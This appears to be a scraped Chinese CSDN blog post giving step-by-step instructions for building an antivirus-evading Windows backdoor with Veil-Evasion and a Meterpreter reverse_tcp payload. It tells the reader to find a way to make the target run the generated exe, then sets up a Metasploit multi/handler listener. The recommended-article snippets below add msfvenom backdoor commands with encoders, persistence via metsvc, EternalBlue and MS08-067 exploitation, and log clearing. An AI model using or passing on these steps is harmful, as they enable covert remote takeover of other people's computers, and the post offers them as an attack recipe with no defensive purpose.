Metasploit使用后门程序渗透Windows

最新推荐文章于 2024-06-25 07:04:09 发布

盗才生

最新推荐文章于 2024-06-25 07:04:09 发布

阅读量3.8k

点赞数 1

分类专栏： kali msf

本文链接：https://blog.csdn.net/three_fish/article/details/48367207

版权

kali 同时被 2 个专栏收录

4 篇文章 0 订阅

订阅专栏

msf

3 篇文章 0 订阅

订阅专栏

终端中运行 veil-evasion

输入list查看可用模块

这里使用 7) c/shellcode_inject/flatc

输入 use 7

generate

1 (default)

回车选择默认的 windows/meterpreter/reverse_tcp

tab 选择本地IP 也可以自己输入指定IP

端口用默认的 4444

回车回车

Generating shellcode... 等待

指定文件名

/usr/share/veil-output/compiled/ 在此位置找到所生成的exe文件想方法使目标机运行

启动msf (msfconsole)

加载exploit/multi/handler模块: use exploit/multi/handler

设定 payload: set payload windows/meterpreter/reverse_tcp

show options 查看所需设置的参数

set LHOST 你的IP （需与 veil操作中所指定的IP相同）

exploit 开始监听

设置本地主机；然后开始监听：exploit -z -j ：

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

盗才生

关注关注

1
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

利用kali对Windows进行msf渗透（详细介绍）

2302_78587828的博客

09-17

1923

msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合，将这两个工具都放在一个Framework实例中。自2015年6月8日起，msfvenom替换了msfpayload和msfencode。msfvenom支持多种操作系统和架构，包括Windows、Linux、macOS以及各种CPU架构。它可以生成各种类型的恶意软件，如反向连接和绑定Shell、Meterpreter反弹Shell、恶意文档、木马等。

kali metasploit 制作后门程序远程操控基本使用方法

qq_51685718的博客

12-03

4139

kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe lhost后面加的是本机ip，lport后面加的是想要打开的端口号执行后会在本地生成一个biyu.exe的文件如果直接上传到win系统会被杀毒软件杀掉，我们可以用自己的电脑对其进行一个加壳操作。下

参与评论您还未登录，请先登录后发表或查看评论

【工具使用】——Metasploit(MSF)使用详解(超详细)

最新发布

2401_84254343的博客

06-25

1038

show options #查看这个模块需要配置的信息exploitinfo： #查看这个漏洞的信息show payloads #该命令可以查看当前漏洞利用模块下可用的所有Payloadset RHOST 192.168.100.158 #设置RHOST，也就是要攻击主机的ipset LHOST 192.168.100.132 #设置LHOST，也就是我们主机的ip，用于接收从目标机弹回来的shell。

windows渗透技巧

Z_Grant的博客

10-21

1116

文章目录一，命令行下载方法二，搜索指定文件路径和 ☞dir三，查看进程的方法 ☞tasklist四，绕过杀软，离线读密码五，使用windows-kernel-exploits脚本提权一，命令行下载方法 1. powershell下载 2. ftp 3. 写脚本（马），菜刀连接 4. bitsadmin 5. certutil 二，搜索指定文件路径和 ☞dir dir /b...

内网渗透之如何玩转Meterpreter？

izj007的博客

05-30

1677

随着windows系统的不断更新完善，windows对用户系统的安全力度也在加强。这对我们的渗透，也带来了不少的麻烦。今天我将带大家，利用目前流行的 metasploit 框架，绕过一些 UAC 及防火墙的限制，从而达到成功利用的目的！由于绕过 UAC 的功能需在 meterpreter 的shell 才能实现。因此，我们首先要做的就是取得目标机器的 meterpreter shell 。

metasploit后门维持技术

weixin_30640291的博客

05-31

163

在meterpreter中执行：run metsvc -A 如此以后便会自动在服务器当中多生成一个meterpreter的服务，并且是开机自动启动。所以二次如果要利用直接： use exploit/mutil/handlerset payload windows/metsvc_bind_tcpset lhost x.x.x.xset lport 31337set rhost ...

Metasploit 渗透测试之制作隐藏后门

weixin_46035615的博客

05-01

2885

1. 实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 2. 实战-Linux 无文件木马程序 3. 实战-使用脚本来进行自动创建后门 4. 系统日志清理

Kali Linux渗透测试小实践——Metasploit与后门木马

PICACHU+++的博客

01-08

2909

Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。

渗透测试神器——Metasploit Framerwork使用

PICACHU+++的博客

02-19

4122

一、介绍 Metasploit Framework是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试，shellcode编写和漏洞研究提供了一个可靠的平台，这个框架主要是由面向对象的Ruby编程语言编写的，并带有由C语言，汇编程序和Python编写的可选组件。二、基本使用 1.信息收集 db_nmap /nmap -T [0-5]:默认为T3，T4表示最大TCP扫描延迟为10ms -sS:TCP SYN扫描，半开扫描 -sA:TCP ACK扫描 -sT:TCP扫描

Kali下metasploit渗透Windows7

如诗如画

06-16

3098

Kali下metasploit渗透Windows7/教程详细/ 靶场环境操作系统 Kali_Linux IP:172.17.201.44 靶机 windows7 IP:172.17.201.12 使用工具 metasploit nmap 正文 1.首先使用namp对靶机进行扫描，确定445端口是否开启 2.打开metasploit搜索ms17-010 1. msfconsole 2. search ms17-010 3.选择漏洞验证扫描工具并设置参数 1. use auxiliary/ad

Kail之MSF渗透测试--MS08-067

m0_57485346的博客

02-13

1547

MS08-067

使用MSF渗透攻击win7主机并远程执行命令

weixin_43991459的博客

06-15

3194

Win7 网络连接检查命令： Linux下： auxiliary是辅助模块用命令找寻关于ms17_010 的可运行模块用指令，调用模块进行扫描，侦察靶机是否具备被攻击的条件通过查看需要配置的参数，并用set进行配置，后面显示yes的必须设置若为【-】以上说明已经打了改漏洞的补丁刚才这个过程，是通过辅助模块探测目标主机的系统是否存在该漏洞。下图的目标主机存在该漏洞设置完成后出现【+】表示可以入侵水印遮挡内容为：开始加载使用入侵模块，进行入侵使用指令查看可以使用的攻击载荷若失败将靶机

msf生成windows后门程序

Deeeelete的博客

02-04

2863

进入文件夹，我们先要把我们需要制作后门程序的正常exe文件拖进去在此处打开终端，确保该路径存在这个exe文件! 输入命令 msfvenom -a x86 --platform widows -p windows/meterpreter/reverse_tcp LHOST=192.168.132.133 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i ...

Metasploit渗透winserv 2003 sp1

04-26

2269

今天因为比赛的原因写一个关于MS08_067的渗透文章，网上已经有很多前辈写过关于MS08_067的文章，非常的好，我也看了很多的文章，对我启发很大。话不多说！开始我今天做题用到的主角MS08_067。首先我们要先安装好Kali linux 这个在座的肯定比我要熟，对里面的工具，命令已经很透彻了。我们先对目标靶机进行信息收集，就用到了Nmap这个工具我使用的参数是 -O 扫描系统版本...

Kali Linux-Metasploit入侵Windows10系统

热门推荐

冷色调的夏天的博客

08-01

3万+

Kali Linux-Metasploit入侵Windows10 写在前文距离上一次写KALI黑客攻防的博文已是去年这个时候了之所以再次动手写这类的文章一是因为兴趣，二是看到网上五花八门的文章都是复制粘贴过来的，而且并没有写的很清楚，因此就有了本篇博客的出现免责声明切勿根据本文做违法之事，如做违法之事皆于博主本人无关！实验环境以下环境可以是两台真实物理机，也可以是一台物理机安装虚拟机上述两种情况我均已尝试成功，由于在一台电脑上写博文较为方便因此之后的截图是在一台物理机上的。 KALI：（攻

常见的几种Windows后门持久化方式

qq284489030的博客

05-09

2094

0×0 背景持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后，通过在服务器上放置一些后门（脚本、进程、连接之类），来方便他以后持久性的入侵，简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用。 0×1 注册表自启动最常见的在指定键值添加一个新的键值类型为REG_SZ,数据项中添写需要运行程序的路径即可以启动，此类操作一些较为敏感容易被本地AV...

演示使用Metasploit入侵Windows

weixin_34001430的博客

04-25

952

我使用Kali Linux的IP地址是192.168.0.112；在同一局域网内有一台运行Windows XP（192.168.0.108）的测试电脑。本文演示怎么使用Metasploit入侵windows xp sp3。启动msfconsole： # msfconsole 选择一个漏洞： msf > search platform: windows xp sp3 ...

MSF Exploit入侵电脑实践(Win7/Win10皆可)

xiaohujiang的博客

07-10

5909

msf exploit入侵电脑(Win7/Win10皆可) 需要的工具：msfvenom . msfconsole (kali里面有) msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.144 LPORT=6666 -f exe -o xss.exe msfven

Metasploit进行渗透windows7

Edward的博客

08-25

1万+

没有测试---先行记录很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣，针对这些以下业内相关专家就给大家介绍下，当下黑客怎么利用Metasploit进行渗透windows7的。设定目标主机为：cn_win7_x86_7601虚拟机，地址为：192.168.0.116；而本地主机就为：192.168.0.149。方法步骤一：黑客用Msfpayl

Windows版Metasploit使用指南

在Windows环境下，Metasploit通过Msfconsole.bat和Msfweb.bat提供控制台和图形界面。Msfconsole是命令行工具，适合高级用户进行更灵活的操作；而Msfweb则提供了一个图形化的用户界面，使得操作更加直观，对于初学者...